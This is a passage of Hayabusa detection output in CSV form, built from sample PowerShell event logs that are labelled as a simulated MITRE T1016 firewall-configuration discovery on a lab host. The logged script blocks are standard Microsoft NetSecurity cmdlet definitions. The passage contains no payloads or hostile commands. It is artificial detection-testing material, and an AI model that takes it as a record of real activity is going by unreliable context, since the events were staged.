[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is 
[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeSA' function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeSA'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallSetting ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSetting""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecuritySettingData' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSetting' function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 